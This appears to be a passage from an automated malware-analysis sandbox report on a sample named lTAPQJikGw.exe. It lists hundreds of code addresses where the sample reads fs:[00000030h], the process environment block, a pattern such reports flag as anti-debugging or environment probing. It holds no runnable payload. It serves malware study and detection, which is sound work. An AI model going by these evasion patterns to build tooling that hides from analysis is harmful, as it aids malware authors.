          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EB02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015020A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015190AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01503B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01503B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015553CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015003E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01564257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0151927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FA229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01514A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01514A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01513D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01553540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01583D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0155A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01504D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01588DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014ED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01502581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01501DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014F746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150BC2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8CD6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015914FB mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01556CF0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E849B mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EEF40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014EFF60 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8F6A mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0156FF10 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A070D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FF716 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A70E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150E730 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014D4F2E mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01557794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0159AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014E766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014FAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0150A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01508E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01591608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_014DE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015A8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_01518EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_0158FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\lTAPQJikGw.exeCode function: 2_2_015036CC mov eax, dword ptr fs:[00000030h]
